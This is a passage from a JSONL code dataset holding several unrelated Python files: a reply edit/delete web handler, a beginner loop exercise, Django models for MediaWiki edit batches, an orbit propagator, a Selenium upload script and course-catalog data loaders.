reply.deleted_at = datetime.now()\n reply.deleted_user = request.user\n reply.article.reply_count -= 1\n request.dbsession.commit()\n return \"success\"\n else:\n request.setResponseCode(UNAUTHORIZED)\n return \"unauthorized\"\n\n\nclass ReplyEdit(YuzukiResource):\n def render_POST(self, request):\n reply_id = request.get_argument(\"id\")\n query = request.dbsession.query(Reply) \\\n .filter(Reply.uid == reply_id) \\\n .filter(Reply.enabled == True) \\\n .options(subqueryload(Reply.user))\n result = query.all()\n if not result:\n request.setResponseCode(NOT_FOUND)\n return \"reply not found\"\n reply = result[0]\n if request.user and request.user == reply.user:\n content = request.get_argument(\"content\")\n if content.strip():\n reply_record = ReplyRecord(reply)\n reply.content = content\n request.dbsession.add(reply_record)\n request.dbsession.commit()\n return \"reply edit success\"\n else:\n raise BadArgument(\"content\", \"empty\")\n else:\n request.setResponseCode(UNAUTHORIZED)\n return \"unauthorized\"","sub_path":"resource/reply.py","file_name":"reply.py","file_ext":"py","file_size_in_byte":5767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"612017801","text":"\"\"\" Escreva um programa que escreva na tela de 1 até 100, de 1 em 1, 2 vezes. A primeira deve ser usando a estrutura for,\na segunda utilizando while.\"\"\"\n# Com for\nfor contador in range(1, 101):\n print(contador)\nnumero = 1\n# Com While\nwhile numero != 101:\n print(numero)\n numero = numero + 1\n","sub_path":"Seção 6 - Estruturas de repetição/ex002.py","file_name":"ex002.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"231257353","text":"from django.conf import settings\nfrom django.db import models\nfrom django.db import transaction\nfrom django.db.utils import IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\nfrom django_bulk_update.manager import BulkUpdateManager\nfrom caching.base import CachingManager, CachingMixin\nfrom collections import namedtuple\nfrom cached_property import cached_property\nfrom collections import defaultdict\n\nimport re\nimport json\nfrom pytz import UTC\nfrom datetime import datetime\nfrom .utils import grouper\n\nMAX_CHARFIELD_LENGTH = 190\n\nclass Tool(CachingMixin, models.Model):\n \"\"\"\n A tool, making edits with some ids in the edit summaries\n \"\"\"\n objects = CachingManager()\n\n Match = namedtuple('Match', 'uid user summary')\n\n name = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n shortid = models.CharField(max_length=32)\n\n idregex = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n idgroupid = models.IntegerField()\n\n summaryregex = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n summarygroupid = models.IntegerField()\n\n userregex = models.CharField(max_length=MAX_CHARFIELD_LENGTH, null=True, blank=True)\n usergroupid = models.IntegerField(null=True, blank=True)\n\n url = models.URLField()\n\n class Meta(object):\n base_manager_name = 'objects'\n\n def __str__(self):\n return self.name\n\n def match(self, user, comment):\n \"\"\"\n Determines if an edit made with the supplied comment\n came from that tool, based on string matching with\n the supplied regular expressions.\n\n :returns: a Match named tuple if there\n is a match, None otherwise\n \"\"\"\n idre = re.compile(self.idregex)\n idmatch = idre.match(comment)\n summaryre = re.compile(self.summaryregex)\n summarymatch = summaryre.match(comment)\n\n if not idmatch:\n return\n\n uid = idmatch.group(self.idgroupid)\n if not uid:\n return\n summary = ''\n if summarymatch:\n summary = summarymatch.group(self.summarygroupid)\n\n realuser = user\n if self.userregex:\n userre = re.compile(self.userregex)\n usermatch = userre.match(comment)\n if usermatch and usermatch.group(self.usergroupid):\n realuser = usermatch.group(self.usergroupid)\n\n return self.Match(uid=uid, user=realuser, summary=summary)\n\n @cached_property\n def nb_batches(self):\n return self.batch_set.count()\n\n @cached_property\n def nb_unique_users(self):\n return self.batch_set.values('user').distinct().count()\n\nclass BatchManager(BulkUpdateManager):\n \"\"\"\n This makes Batch methods available in migrations.\n \"\"\"\n use_in_migrations = True\n\nclass Batch(models.Model):\n \"\"\"\n A group of edits\n \"\"\"\n objects = BatchManager()\n\n tool = models.ForeignKey(Tool, on_delete=models.CASCADE)\n user = models.CharField(max_length=MAX_CHARFIELD_LENGTH, db_index=True, blank=False)\n uid = models.CharField(max_length=MAX_CHARFIELD_LENGTH, db_index=True, blank=False)\n\n summary = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n started = models.DateTimeField()\n ended = models.DateTimeField(db_index=True)\n nb_edits = models.IntegerField()\n nb_distinct_pages = models.IntegerField()\n nb_reverted_edits = models.IntegerField()\n nb_new_pages = models.IntegerField()\n total_diffsize = models.BigIntegerField()\n\n archived = models.BooleanField(default=False)\n\n # Internal field to keep track of when a batch was last modified.\n # In general this will not be equal to 'ended' as we can ingest\n # batches retrospectively after they ended.\n last_modified = 
models.DateTimeField(auto_now=True)\n\n    class Meta:\n        unique_together = (('tool','uid','user'))\n\n    def __str__(self):\n        return '<Batch {}/{} by {}>'.format(self.tool.shortid, self.uid, self.user)\n\n    @property\n    def full_uid(self):\n        return self.tool.shortid+'/'+self.uid\n\n    @property\n    def editing_speed(self):\n        time_diff = self.duration\n        if time_diff <= 0:\n            return '∞'\n        return '{:5.1f}'.format((self.nb_edits * 60.)/time_diff).strip()\n\n    @property\n    def entities_speed(self):\n        time_diff = self.duration\n        if time_diff <= 0:\n            return '∞'\n        return '{:5.1f}'.format((self.nb_pages * 60.)/time_diff).strip()\n\n    @cached_property\n    def duration(self):\n        return (self.ended - self.started).total_seconds()\n\n    @property\n    def nb_reverted(self):\n        return self.nb_reverted_edits\n\n    @cached_property\n    def revertable_edits(self):\n        return self.edits.filter(reverted=False)\n\n    @cached_property\n    def active_revert_task(self):\n        try:\n            return self.revert_tasks.filter(cancel=False,complete=False).get()\n        except ObjectDoesNotExist:\n            return None\n\n    @property\n    def can_be_reverted(self):\n        return (self.nb_revertable_edits > 0 and\n                self.active_revert_task is None and\n                not self.archived)\n\n    @cached_property\n    def nb_revertable_edits(self):\n        return self.nb_edits - self.nb_reverted_edits\n\n    @cached_property\n    def nb_pages(self):\n        # used to be: self.edits.all().values('title').distinct().count()\n        # but that is too expensive when the batches get large, so we cache this:\n        return self.nb_distinct_pages\n\n    @cached_property\n    def nb_undeleted_new_pages(self):\n        return self.revertable_edits.filter(changetype__in=['new','restore','delete']).count()\n\n    @property\n    def nb_existing_pages(self):\n        return self.nb_pages - self.nb_new_pages\n\n    @property\n    def avg_diffsize(self):\n        if self.nb_edits:\n            return self.total_diffsize / self.nb_edits\n        return 0\n\n    @property\n    def url(self):\n        return reverse('batch-view', args=[self.tool.shortid, self.uid])\n\n    @property\n    def csv_url(self):\n        return reverse('csv-batch-edits', args=[self.tool.shortid, self.uid])\n\n    @cached_property\n    def tag_ids(self):\n        return self.sorted_tags.values_list('id', flat=True)\n\n    @cached_property\n    def sorted_tags(self):\n        return self.tags.order_by('-priority', 'id')\n\n    @cached_property\n    def reverting_batches(self):\n        \"\"\"\n        Returns the list of batches which revert this batch\n        \"\"\"\n        uids = self.revert_tasks.values_list('uid', flat=True)\n        return Batch.objects.filter(uid__in=uids)\n\n    @cached_property\n    def reverted_batch(self):\n        \"\"\"\n        Returns the batch reverted by this batch, if any (None otherwise).\n        \"\"\"\n        try:\n            return Batch.objects.get(revert_tasks__uid=self.uid)\n        except Batch.DoesNotExist:\n            return None\n\n    def recompute_cached_stats(self):\n        \"\"\"\n        Recomputes all the cached stats from the edits.\n        This is expensive to do - it should only be done if things have gone wrong.\n\n        This does not save the Batch object yet.\n        \"\"\"\n        # Refuse to do this if the batch is archived, as this will yield incorrect results\n        if self.archived:\n            return\n\n        self.nb_edits = self.edits.count()\n        self.nb_distinct_pages = self.edits.all().values('title').distinct().count()\n        self.nb_reverted_edits = self.edits.all().filter(reverted=True).count()\n        self.nb_new_pages = self.edits.all().filter(changetype='new').count()\n        self.total_diffsize = self.edits.all().aggregate(total_diff=models.Sum('newlength')-models.Sum('oldlength')).get('total_diff')\n\n    def archive(self, batch_inspector):\n        \"\"\"\n        Recomputes all cached statistics from the edits, computes tags 
again,\n        and then deletes all edits in the batch except the last few ones.\n\n        This marks the batch as archived.\n        \"\"\"\n        if self.archived:\n            return\n\n        # First, make sure we have up-to-date batch statistics and tags\n        self.recompute_cached_stats()\n        batch_inspector.add_missing_tags(self)\n\n        # Then, archive the batch\n        if self.nb_edits > settings.EDITS_KEPT_AFTER_ARCHIVAL:\n            self.archived = True\n            self.save()\n            first_revid = self.edits.order_by('-newrevid')[settings.EDITS_KEPT_AFTER_ARCHIVAL-1].newrevid\n            self.edits.filter(newrevid__lt=first_revid).delete()\n\n    @classmethod\n    def archive_old_batches(cls, batch_inspector):\n        \"\"\"\n        Archive all batches which have not been modified for a long time\n        and contain more edits than our archival threshold.\n\n        This method is meant to be run periodically.\n        \"\"\"\n        cutoff_date = datetime.utcnow().replace(tzinfo=UTC) - settings.BATCH_ARCHIVAL_DELAY\n        for batch in cls.objects.filter(nb_edits__gt=settings.EDITS_KEPT_AFTER_ARCHIVAL, archived=False, ended__lt=cutoff_date):\n            batch.archive(batch_inspector)\n\nfrom tagging.models import Tag\n\nclass Edit(models.Model):\n    \"\"\"\n    A MediaWiki edit as returned by the Event Stream API\n    \"\"\"\n    id = models.BigIntegerField(unique=True, primary_key=True)\n    oldrevid = models.BigIntegerField(null=True)\n    newrevid = models.BigIntegerField()\n    oldlength = models.IntegerField()\n    newlength = models.IntegerField()\n    timestamp = models.DateTimeField(db_index=True)\n    title = models.CharField(max_length=MAX_CHARFIELD_LENGTH, db_index=True)\n    namespace = models.IntegerField()\n    uri = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n    comment = models.TextField()\n    parsedcomment = models.TextField()\n    bot = models.BooleanField()\n    minor = models.BooleanField()\n    changetype = models.CharField(max_length=32)\n    user = models.CharField(max_length=MAX_CHARFIELD_LENGTH)\n    patrolled = models.BooleanField()\n\n    # Inferred by us\n    batch = models.ForeignKey(Batch, on_delete=models.CASCADE, related_name='edits')\n    reverted = models.BooleanField(default=False)\n\n    class Meta:\n        indexes = [\n            models.Index(fields=['batch', 'newrevid'])\n        ]\n\n    reverted_re = re.compile(r'^/\\* undo:0\\|\\|(\\d+)\\|')\n\n    @property\n    def url(self):\n        return '{}?diff={}&oldid={}'.format(settings.MEDIAWIKI_INDEX_ENDPOINT, self.newrevid, self.oldrevid)\n\n    @property\n    def revert_url(self):\n        if self.oldrevid:\n            return '{}?title={}&action=edit&undoafter={}&undo={}'.format(settings.MEDIAWIKI_INDEX_ENDPOINT, self.title, self.oldrevid, self.newrevid)\n        elif self.changetype == 'delete':\n            return '{}Special:Undelete/{}'.format(settings.MEDIAWIKI_BASE_URL, self.title)\n        else:\n            return '{}?title={}&action=delete'.format(settings.MEDIAWIKI_INDEX_ENDPOINT, self.title)\n\n    def __str__(self):\n        return '<Edit {}>'.format(self.url)\n\n    @classmethod\n    def from_json(cls, json_edit, batch):\n        \"\"\"\n        Creates an edit from json, without saving it\n        \"\"\"\n        # The following two fields are not provided in deletions\n        revision = json_edit.get('revision', {})\n        length = json_edit.get('length', {})\n        changetype = json_edit['type']\n        if changetype == 'log':\n            changetype = json_edit['log_action']\n\n        return cls(\n            id = json_edit['id'],\n            oldrevid = revision.get('old') or 0,\n            newrevid = revision.get('new') or 0,\n            oldlength = length.get('old') or 0,\n            newlength = length.get('new') or 0,\n            timestamp = datetime.fromtimestamp(json_edit['timestamp'], tz=UTC),\n            title = json_edit['title'][:MAX_CHARFIELD_LENGTH],\n            namespace = json_edit['namespace'],\n            uri = 
json_edit['meta']['uri'][:MAX_CHARFIELD_LENGTH],\n comment = json_edit['comment'],\n parsedcomment = json_edit['parsedcomment'],\n bot = json_edit['bot'],\n minor = json_edit.get('minor') or False,\n changetype = changetype,\n user = json_edit['user'][:MAX_CHARFIELD_LENGTH],\n patrolled = json_edit.get('patrolled') or False,\n batch = batch,\n reverted = False)\n\n @classmethod\n def ingest_edits(cls, json_batch):\n # Map from (toolid, uid, user) to Batch object\n batches = {}\n model_edits = []\n reverted_ids = []\n deleted_pages = {} # map: title -> latest deletion timestamp\n restored_pages = {} # map: title -> latest restoration timestamp\n modified_pages = defaultdict(set) # map: batch_key -> set of touched pages\n new_tags = defaultdict(set)\n\n tools = Tool.objects.all()\n\n for edit_json in json_batch:\n if not edit_json or edit_json.get('namespace') not in settings.WATCHED_NAMESPACES:\n continue\n timestamp = datetime.fromtimestamp(edit_json['timestamp'], tz=UTC)\n\n # First, check if this is a revert\n revert_match = cls.reverted_re.match(edit_json['comment'])\n if revert_match:\n reverted_ids.append(int(revert_match.group(1)))\n\n # or a deletion\n if edit_json.get('log_action') == 'delete':\n deleted_pages[edit_json['title']] = timestamp\n\n # or a restore\n if edit_json.get('log_action') == 'restore':\n restored_pages[edit_json['title']] = timestamp\n\n # Then, try to match the edit with a tool\n match = None\n matching_tool = None\n for tool in tools:\n match = tool.match(edit_json['user'], edit_json['comment'])\n if match is not None:\n matching_tool = tool\n break\n\n if match is None:\n continue\n\n # Try to find an existing batch for that edit\n batch_key = (matching_tool.shortid, match.uid)\n batch = batches.get(batch_key)\n\n created = False\n if not batch:\n batch, created = Batch.objects.get_or_create(\n tool=tool, uid=match.uid,\n defaults={\n 'user': match.user[:MAX_CHARFIELD_LENGTH],\n 'summary': match.summary[:MAX_CHARFIELD_LENGTH],\n 'started': timestamp,\n 'ended': timestamp,\n 'nb_edits': 0,\n 'nb_distinct_pages': 0,\n 'nb_new_pages': 0,\n 'nb_reverted_edits': 0,\n 'total_diffsize': 0,\n })\n\n # Check that the batch is owned by the right user\n if batch.user != match.user:\n if created:\n batch.delete()\n continue\n\n batch.nb_edits += 1\n length_obj = edit_json.get('length') or {}\n batch.total_diffsize += (length_obj.get('new') or 0) - (length_obj.get('old') or 0)\n batch.ended = max(batch.ended, timestamp)\n\n batches[batch_key] = batch\n\n # Create the edit object\n model_edit = Edit.from_json(edit_json, batch)\n model_edits.append(model_edit)\n\n # Extract tags from the edit\n edit_tags = Tag.extract(model_edit)\n missing_tags = [tag.id for tag in edit_tags if tag.id not in batch.tag_ids]\n new_tags[batch.id].update(missing_tags)\n\n # Take note of the modified page, for computation of the number of entities edited by a batch\n modified_pages[batch_key].add(edit_json['title'])\n # And the number of new pages\n if model_edit.changetype == 'new':\n batch.nb_new_pages += 1\n\n # if we saw some deletions which match any creations or undeletions we know of, mark them as deleted.\n # We do this before creating the previous edits in the same batch, because deletions and restorations\n # do not come with unique ids to identify the creation, deletion or restoration that they undo\n # (this is a notion that we introduce ourselves) so if a deletion and the corresponding revert happen\n # in the same batch we need to inspect the order in which they happened.\n if 
deleted_pages:\n cls.mark_as_reverted(Edit.objects.filter(title__in=deleted_pages.keys(), changetype__in=['new','restore']))\n for edit in model_edits:\n if (edit.title in deleted_pages\n and edit.changetype in ['new','restore']\n and edit.timestamp < deleted_pages.get(edit.title)):\n edit.reverted = True\n edit.batch.nb_reverted_edits += 1\n # finally if we saw some undeletions which match any deletions we know of, mark them as undone\n if restored_pages:\n cls.mark_as_reverted(Edit.objects.filter(title__in=restored_pages.keys(), changetype='delete'))\n for edit in model_edits:\n if (edit.title in restored_pages\n and edit.changetype == 'delete'\n and edit.timestamp < restored_pages.get(edit.title)):\n edit.reverted = True\n edit.batch.nb_reverted_edits += 1\n\n # Create all Edit objects update all the batch objects\n if batches:\n # Update the number of modified pages\n for batch_key, pages in modified_pages.items():\n batch = batches.get(batch_key)\n existing_pages = set(batch.edits.filter(title__in=pages).values_list('title',flat=True))\n unseen_pages = pages-existing_pages\n batch.nb_distinct_pages += len(unseen_pages)\n\n # Create all the edit objects\n try:\n with transaction.atomic():\n Edit.objects.bulk_create(model_edits)\n except IntegrityError as e:\n # Oops! Some of them existed already!\n # Let's add them one by one instead.\n for edit in model_edits:\n try:\n existing_edit = Edit.objects.get(id=edit.id)\n # this edit was already seen: we need to remove it\n # from the associated batch count\n batch_key = (edit.batch.tool.shortid, edit.batch.uid)\n batch = batches.get(batch_key)\n if batch:\n batch.nb_edits -= 1\n batch.total_diffsize -= edit.newlength - edit.oldlength\n if edit.changetype == 'new':\n batch.nb_new_pages -= 1\n if edit.reverted:\n batch.nb_reverted_edits -= 1\n except Edit.DoesNotExist:\n edit.save()\n\n # update batch objects\n Batch.objects.bulk_update(list(batches.values()),\n update_fields=['ended', 'nb_edits', 'nb_distinct_pages',\n 'nb_reverted_edits', 'nb_new_pages', 'total_diffsize'])\n\n # update tags for batches\n if new_tags:\n Tag.add_tags_to_batches(new_tags)\n\n # If we saw any \"undo\" edit, mark all matching edits as reverted.\n # We do this after creating the latest edits because it could be possible that\n # an edit from the batch we just processed was undone in the same go.\n if reverted_ids:\n cls.mark_as_reverted(Edit.objects.filter(newrevid__in=reverted_ids))\n\n @classmethod\n def ingest_jsonlines(cls, fname, batch_size=50):\n\n def lines_generator():\n with open(fname, 'r') as f:\n for line in f:\n try:\n yield json.loads(line.strip())\n except ValueError:\n pass\n\n for batch in grouper(lines_generator(), batch_size, ):\n cls.ingest_edits(batch)\n\n @classmethod\n def mark_as_reverted(cls, qs):\n \"\"\"\n Given a queryset of edits, mark each edit object as reverted and update\n the batch-level statistics accordingly.\n \"\"\"\n nb_updated = qs.update(reverted=True)\n # there is probably a clever way to do this in SQL but there are generally\n # few reverts so this scales fine for now.\n if nb_updated:\n for edit in qs:\n b = edit.batch\n b.nb_reverted_edits += 1\n b.save(update_fields=['nb_reverted_edits'])\n\n @classmethod\n def latest_edit_time(cls):\n try:\n return Edit.objects.all().order_by('-timestamp').values_list('timestamp', flat=True)[0]\n except IndexError: # no edit in the database…\n return datetime.utcnow().replace(tzinfo=UTC)\n\n @classmethod\n def current_lag(cls):\n \"\"\"\n Returns the amount of time since the last 
edit successfully ingested.\n \"\"\"\n return datetime.utcnow().replace(tzinfo=UTC) - cls.latest_edit_time()\n","sub_path":"store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":21122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"402123188","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import ode\n\nimport planetary_data as pd\nimport tools as t\n\ndef null_perts(): # no perturbations\n return {\n 'J2': False,\n 'aero': False,\n 'moon_grav': False,\n 'solar_gravity': False\n }\n\nclass OrbitPropagator:\n def __init__(self, state0, tspan, dt, coes=False, deg=True, cb=pd.earth, perts=null_perts()): # dt = timestep, cb = central body\n if coes:\n self.r0, self.v0, date = t.coes2rv(state0, deg=deg, mu=cb['mu'])\n else:\n self.r0 = state0[:3]\n self.v0 = state0[3:]\n\n self.y0 = list(self.r0) + list(self.v0)\n self.tspan = tspan\n self.dt = dt\n self.cb = cb\n\n # total number of steps\n self.n_steps = int(np.ceil(self.tspan / self.dt))\n\n # initialize variables\n self.ts = np.zeros((self.n_steps, 1))\n self.ys = np.zeros((self.n_steps, 6))\n self.ts[0] = 0\n self.ys[0,:] = self.y0\n self.step = 1\n\n # initiate solver\n self.solver = ode(self.diffy_q)\n self.solver.set_integrator('lsoda')\n self.solver.set_initial_value(self.y0, 0)\n\n # define perturbations dictionary\n self.perts = perts\n\n self.propagate_orbit()\n \n def propagate_orbit(self):\n # propagate orbit\n while self.solver.successful() and self.step < self.n_steps:\n self.solver.integrate(self.solver.t + self.dt)\n self.ts[self.step] = self.solver.t\n self.ys[self.step] = self.solver.y\n self.step += 1\n \n self.rs = self.ys[:,:3]\n self.vs = self.ys[:,3:]\n \n def diffy_q(self, t, y):\n # unpack state\n rx, ry, rz, vx, vy, vz = y\n r = np.array([rx, ry, rz])\n\n # norm of the radius vector\n norm_r = np.linalg.norm(r)\n\n # two body acceleration\n a = -r * self.cb['mu'] / norm_r**3\n\n # J2 perturbation\n if self.perts['J2']:\n z2 = r[2]**2\n r2 = norm_r**2\n tx = r[0] / norm_r * (5 * z2 / r2 - 1)\n ty = r[1] / norm_r * (5 * z2 / r2 - 1)\n tz = r[2] / norm_r * (5 * z2 / r2 - 3)\n\n a_j2 = 1.5 * self.cb['J2'] * self.cb['mu'] * self.cb['radius']**2 / norm_r**4 * np.array([tx,ty,tz])\n\n a += a_j2\n\n return [vx,vy,vz,a[0],a[1],a[2]]\n \n def calculate_coes(self, degrees=True):\n print('Calculating COEs...')\n\n self.coes = np.zeros((self.n_steps, 6))\n\n for n in range(self.n_steps):\n self.coes[n,:] = t.rv2coes(self.rs[n,:], self.vs[n,:], mu=self.cb['mu'], degrees=degrees)\n\n def plot_3d(self, show_plot=False, save_plot=False, title='Some Plot'):\n # 3D plot\n fig = plt.figure(figsize=(16,8))\n ax = fig.add_subplot(111, projection='3d')\n\n # plot trajectory and starting point\n ax.plot(self.rs[:,0], self.rs[:,1], self.rs[:,2], 'b', label='Trajectory')\n ax.plot([self.rs[0,0]], [self.rs[0,1]], [self.rs[0,2]], 'bo', label='Starting Position')\n\n # plot earth\n _u, _v = np.mgrid[0:2 * np.pi:20j, 0:np.pi:10j]\n _x = self.cb['radius'] * np.cos(_u) * np.sin(_v)\n _y = self.cb['radius'] * np.sin(_u) * np.sin(_v)\n _z = self.cb['radius'] * np.cos(_v)\n ax.plot_surface(_x, _y, _z, cmap='Greens')\n\n # plot X, Y, Z vectors (arrows)\n l = self.cb['radius'] * 2.0\n x, y, z = [[0,0,0], [0,0,0], [0,0,0]] # where arrows start\n u, v, w = [[l,0,0], [0,l,0], [0,0,l]] # where arrows end\n ax.quiver(x, y, z, u, v, w, color='y')\n\n # check for custom axes limits\n max_val = np.max(np.abs(self.rs))\n\n # set labels and title\n ax.set_xlim([-max_val, max_val])\n ax.set_ylim([-max_val, max_val])\n ax.set_zlim([-max_val, max_val])\n ax.set_xlabel('X (km)')\n ax.set_ylabel('Y (km)')\n ax.set_zlabel('Z (km)')\n ax.set_aspect('equal')\n \n ax.set_title(title)\n plt.legend()\n\n if show_plot:\n plt.show()\n if save_plot:\n 
plt.savefig(title.replace(\" \", \"_\") + '.png', dpi=300)","sub_path":"OrbitPropagatorKep.py","file_name":"OrbitPropagatorKep.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"570757611","text":"from selenium import webdriver\nfrom pathlib import Path\nimport platform\n\ndefaultUrls = {\n \"dev\": 'http://localhost:5000',\n \"production\": 'http://pmix-borrow-web.com'\n}\n\n\nbrowser = webdriver.Chrome()\nbrowser.get(defaultUrls[\"dev\"])\n\n\nsource_file_path_string = str(Path(\"test/static/Merge/input/source/translations-KER7-2018.10.02-v4-jef.xlsx\").resolve())\ntarget_file_path_string = str(Path(\"test/static/Merge/input/target/KER7-Female-Questionnaire-v4-jef.xlsx\").resolve())\nif platform.system() == 'Windows':\n source_file_path_string = source_file_path_string.replace(\"\\\\\", \"\\\\\\\\\")\n target_file_path_string = target_file_path_string.replace(\"\\\\\", \"\\\\\\\\\")\n\nsource_file_uploader = browser.find_element_by_id(\"source-file\")\nsource_file_uploader.send_keys(source_file_path_string)\ntarget_file_uploader = browser.find_element_by_id(\"target-file\")\ntarget_file_uploader.send_keys(target_file_path_string)\n\nbutton_submit = browser.find_element_by_id(\"btn-submit\")\nbutton_submit.click()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"300930987","text":"\"\"\"Course catalog data loaders\"\"\"\nimport logging\n\nfrom django.conf import settings\nfrom django.db import transaction\nfrom django.db.models import OuterRef, Exists\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom course_catalog.constants import PrivacyLevel, ListType\nfrom course_catalog.etl.exceptions import ExtractException\nfrom course_catalog.etl.utils import log_exceptions\nfrom course_catalog.models import (\n Course,\n CourseInstructor,\n CoursePrice,\n CourseTopic,\n LearningResourceRun,\n LearningResourceOfferor,\n Program,\n ProgramItem,\n Video,\n VideoChannel,\n Playlist,\n PlaylistVideo,\n UserList,\n UserListItem,\n ContentFile,\n)\nfrom course_catalog.utils import load_course_blacklist, load_course_duplicates\nfrom course_catalog.etl.deduplication import get_most_relevant_run\nfrom search import task_helpers as search_task_helpers\nfrom search.constants import COURSE_TYPE\n\nlog = logging.getLogger()\n\nUser = get_user_model()\n\n\ndef load_topics(resource, topics_data):\n \"\"\"Load the topics for a resource into the database\"\"\"\n topics = []\n\n for topic_data in topics_data:\n topic, _ = CourseTopic.objects.get_or_create(name=topic_data[\"name\"])\n topics.append(topic)\n\n resource.topics.set(topics)\n resource.save()\n return topics\n\n\ndef load_prices(resource, prices_data):\n \"\"\"Load the prices for a resource into the database\"\"\"\n prices = []\n\n for price_data in prices_data:\n price, _ = CoursePrice.objects.get_or_create(\n price=price_data.get(\"price\", \"\"),\n mode=price_data.get(\"mode\", \"\"),\n upgrade_deadline=price_data.get(\"upgrade_deadline\", None),\n )\n prices.append(price)\n\n resource.prices.set(prices)\n resource.save()\n return prices\n\n\ndef load_instructors(resource, instructors_data):\n \"\"\"Load the prices for a resource into the database\"\"\"\n instructors = []\n\n for instructor_data in instructors_data:\n instructor, _ = CourseInstructor.objects.get_or_create(**instructor_data)\n instructors.append(instructor)\n\n resource.instructors.set(instructors)\n resource.save()\n return instructors\n\n\ndef load_offered_bys(resource, offered_bys_data):\n \"\"\"Loads a list of offered_by into the resource. 
This operation is additive-only.\"\"\"\n offered_bys = []\n\n for offered_by_data in offered_bys_data:\n offered_by, _ = LearningResourceOfferor.objects.get_or_create(\n name=offered_by_data[\"name\"]\n )\n resource.offered_by.add(offered_by)\n\n resource.save()\n return offered_bys\n\n\ndef load_run(learning_resource, course_run_data):\n \"\"\"Load the course run into the database\"\"\"\n run_id = course_run_data.pop(\"run_id\")\n platform = course_run_data.get(\"platform\")\n instructors_data = course_run_data.pop(\"instructors\", [])\n prices_data = course_run_data.pop(\"prices\", [])\n topics_data = course_run_data.pop(\"topics\", [])\n offered_bys_data = course_run_data.pop(\"offered_by\", [])\n content_files = course_run_data.pop(\"content_files\", [])\n\n learning_resource_run, _ = LearningResourceRun.objects.update_or_create(\n run_id=run_id,\n platform=platform,\n defaults={\n **course_run_data,\n \"object_id\": learning_resource.id,\n \"content_type\": ContentType.objects.get_for_model(learning_resource),\n },\n )\n\n load_topics(learning_resource_run, topics_data)\n load_prices(learning_resource_run, prices_data)\n load_instructors(learning_resource_run, instructors_data)\n load_offered_bys(learning_resource_run, offered_bys_data)\n load_content_files(learning_resource_run, content_files)\n\n return learning_resource_run\n\n\ndef load_course(course_data, blacklist, duplicates):\n \"\"\"Load the course into the database\"\"\"\n # pylint: disable=too-many-branches,too-many-locals\n\n course_id = course_data.pop(\"course_id\")\n runs_data = course_data.pop(\"runs\", [])\n topics_data = course_data.pop(\"topics\", [])\n offered_bys_data = course_data.pop(\"offered_by\", [])\n\n if course_id in blacklist:\n course_data[\"published\"] = False\n\n duplicates_record = next(\n (\n record\n for record in duplicates\n if course_id in record[\"duplicate_course_ids\"]\n ),\n None,\n )\n\n if duplicates_record:\n course = Course.objects.filter(course_id=duplicates_record[\"course_id\"]).first()\n if not course:\n course_data[\"course_id\"] = duplicates_record[\"course_id\"]\n course = Course.objects.create(**course_data)\n created = True\n else:\n created = False\n\n if course_id != duplicates_record[\"course_id\"]:\n duplicate_course = Course.objects.filter(course_id=course_id).first()\n if duplicate_course:\n duplicate_course.published = False\n duplicate_course.save()\n search_task_helpers.delete_course(duplicate_course)\n else:\n platform = course_data.get(\"platform\")\n course, created = Course.objects.update_or_create(\n platform=platform, course_id=course_id, defaults=course_data\n )\n\n run_ids_to_update_or_create = [run[\"run_id\"] for run in runs_data]\n\n for course_run_data in runs_data:\n load_run(course, course_run_data)\n\n if duplicates_record and not created:\n most_relevent_run = get_most_relevant_run(course.runs.all())\n\n if most_relevent_run.run_id in run_ids_to_update_or_create:\n for attr, val in course_data.items():\n setattr(course, attr, val)\n course.save()\n\n load_topics(course, topics_data)\n load_offered_bys(course, offered_bys_data)\n\n if not created and not course.published:\n search_task_helpers.delete_course(course)\n elif course.published:\n search_task_helpers.upsert_course(course.id)\n\n return course\n\n\n@log_exceptions(\"Error loading courses\")\ndef load_courses(courses_data):\n \"\"\"Load a list of programs\"\"\"\n blacklist = load_course_blacklist()\n\n courses_list = list(courses_data or [])\n if len(courses_list) > 0:\n platform = 
courses_list[0].get(\"platform\")\n duplicates = load_course_duplicates(platform)\n else:\n duplicates = []\n\n return [load_course(course, blacklist, duplicates) for course in courses_list]\n\n\n@log_exceptions(\"Error loading program\")\ndef load_program(program_data, blacklist, duplicates):\n \"\"\"Load the program into the database\"\"\"\n # pylint: disable=too-many-locals\n\n program_id = program_data.pop(\"program_id\")\n courses_data = program_data.pop(\"courses\")\n topics_data = program_data.pop(\"topics\", [])\n runs_data = program_data.pop(\"runs\", [])\n offered_bys_data = program_data.pop(\"offered_by\", [])\n\n program, created = Program.objects.update_or_create(\n program_id=program_id, defaults=program_data\n )\n\n load_topics(program, topics_data)\n load_offered_bys(program, offered_bys_data)\n\n for run_data in runs_data:\n load_run(program, run_data)\n\n courses = []\n course_content_type = ContentType.objects.get(model=\"course\")\n\n for position, course_data in enumerate(courses_data):\n # skip courses that don't define a course_id\n if not course_data.get(\"course_id\", None):\n continue\n\n course = load_course(course_data, blacklist, duplicates)\n courses.append(course)\n\n # create a program item or update its position\n ProgramItem.objects.update_or_create(\n program=program,\n content_type=course_content_type,\n object_id=course.id,\n defaults={\"position\": position},\n )\n\n # remove courses from the program that are no longer\n program.items.filter(content_type=course_content_type).exclude(\n object_id__in=[course.id for course in courses]\n ).delete()\n\n if not created and not program.published:\n search_task_helpers.delete_program(program)\n elif program.published:\n search_task_helpers.upsert_program(program.id)\n\n return program\n\n\ndef 